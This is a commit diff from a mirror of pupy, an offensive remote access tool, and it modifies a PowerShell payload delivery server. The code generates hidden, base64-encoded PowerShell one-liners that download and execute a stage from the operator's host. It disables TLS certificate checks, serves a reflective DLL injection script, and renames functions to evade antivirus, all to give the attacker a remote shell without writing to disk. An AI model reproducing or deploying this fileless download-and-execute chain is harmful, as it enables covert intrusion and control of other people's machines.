mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'master' of https://github.com/dc3l1ne/pupy into unstable
This commit is contained in:
n1nj4sec
commit
7e2d666c88
|
|
@ -1,6 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||||
|
from SocketServer import ThreadingMixIn
|
||||||
import os.path
|
import os.path
|
||||||
from pupylib.utils.term import colorize
|
from pupylib.utils.term import colorize
|
||||||
import random, string
|
import random, string
|
||||||
|
|
@ -86,20 +87,20 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
|
||||||
self.send_response(200)
|
self.send_response(200)
|
||||||
self.send_header('Content-type','text/html')
|
self.send_header('Content-type','text/html')
|
||||||
self.end_headers()
|
self.end_headers()
|
||||||
|
|
||||||
if self.server.useTargetProxy == True:
|
if self.server.useTargetProxy == True:
|
||||||
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
|
print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
|
||||||
launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
|
if not self.server.ssl:
|
||||||
server=self.server.link_ip,
|
launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
port=self.server.link_port,
|
else:
|
||||||
url_random_two=url_random_two
|
launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
|
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
|
||||||
launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format(
|
if not self.server.ssl:
|
||||||
server=self.server.link_ip,
|
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
port=self.server.link_port,
|
else:
|
||||||
url_random_two=url_random_two
|
launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
|
||||||
)
|
|
||||||
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
|
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
|
||||||
self.wfile.write(launcher)
|
self.wfile.write(launcher)
|
||||||
print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
|
print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
|
||||||
|
|
@ -112,31 +113,32 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
|
||||||
code=code.replace("Invoke-ReflectivePEInjection", self.server.random_reflectivepeinj_name) # seems to bypass some av like avast :o)
|
code=code.replace("Invoke-ReflectivePEInjection", self.server.random_reflectivepeinj_name) # seems to bypass some av like avast :o)
|
||||||
self.wfile.write(getInvokeReflectivePEInjectionWithDLLEmbedded(self.server.payload_conf))
|
self.wfile.write(getInvokeReflectivePEInjectionWithDLLEmbedded(self.server.payload_conf))
|
||||||
print colorize("[+] ","green")+"[Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll embedded) served!"
|
print colorize("[+] ","green")+"[Stage 2/2] Powershell Invoke-ReflectivePEInjection script (with dll embedded) served!"
|
||||||
print colorize("[+] ","green")+"You should have a pupy shell in few seconds from this host..."
|
print colorize("[+] ","green")+colorize("%s:You should have a pupy shell in few seconds from this host..."%self.client_address[0],"green")
|
||||||
|
|
||||||
else:
|
else:
|
||||||
self.send_response(404)
|
self.send_response(404)
|
||||||
self.end_headers()
|
self.end_headers()
|
||||||
return
|
return
|
||||||
|
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
|
||||||
class ps1_HTTPServer(HTTPServer):
|
def set(self,conf, link_ip, port, ssl, useTargetProxy):
|
||||||
def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy):
|
|
||||||
self.payload_conf = conf
|
self.payload_conf = conf
|
||||||
self.link_ip=link_ip
|
self.link_ip=link_ip
|
||||||
self.link_port=link_port
|
self.link_port=port
|
||||||
self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))])
|
self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))])
|
||||||
self.useTargetProxy = useTargetProxy
|
self.useTargetProxy = useTargetProxy
|
||||||
HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler)
|
|
||||||
if ssl:
|
if ssl:
|
||||||
|
self.ssl=ssl
|
||||||
config = PupyConfig()
|
config = PupyConfig()
|
||||||
|
config.read("pupy.conf")
|
||||||
keyfile=config.get("pupyd","keyfile").replace("\\",os.sep).replace("/",os.sep)
|
keyfile=config.get("pupyd","keyfile").replace("\\",os.sep).replace("/",os.sep)
|
||||||
certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
|
certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
|
||||||
self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
|
self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
|
||||||
|
|
||||||
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False, useTargetProxy=True):
|
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=True, useTargetProxy=True):
|
||||||
try:
|
try:
|
||||||
try:
|
try:
|
||||||
server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)
|
server = ThreadedHTTPServer((ip, port),PupyPayloadHTTPHandler)
|
||||||
|
server.set(conf, link_ip, port, ssl, useTargetProxy)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
# [Errno 98] Adress already in use
|
# [Errno 98] Adress already in use
|
||||||
raise
|
raise
|
||||||
|
|
@ -144,11 +146,25 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Fa
|
||||||
print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
|
print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
|
||||||
print " --- "
|
print " --- "
|
||||||
if useTargetProxy == True:
|
if useTargetProxy == True:
|
||||||
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
|
if not ssl:
|
||||||
|
a="iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
else:
|
||||||
|
a="[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
oneliner=colorize("powershell.exe -w hidden -noni -nop -enc %s"%b, "green")
|
||||||
message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
|
message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
|
||||||
else:
|
else:
|
||||||
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green")
|
if not ssl:
|
||||||
|
a="$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
else:
|
||||||
|
a="$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://%s:%s/%s')"%(link_ip, port, url_random_one)
|
||||||
|
b=b64encode(a.encode('UTF-16LE'))
|
||||||
|
oneliner=colorize("powershell.exe -w hidden -noni -nop -enc %s"%b, "green")
|
||||||
message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
|
message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
|
||||||
|
print colorize("powershell.exe -w hidden -noni -nop -enc %s"%a, "green")
|
||||||
|
print " --- "
|
||||||
print oneliner
|
print oneliner
|
||||||
print " --- "
|
print " --- "
|
||||||
print message
|
print message
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue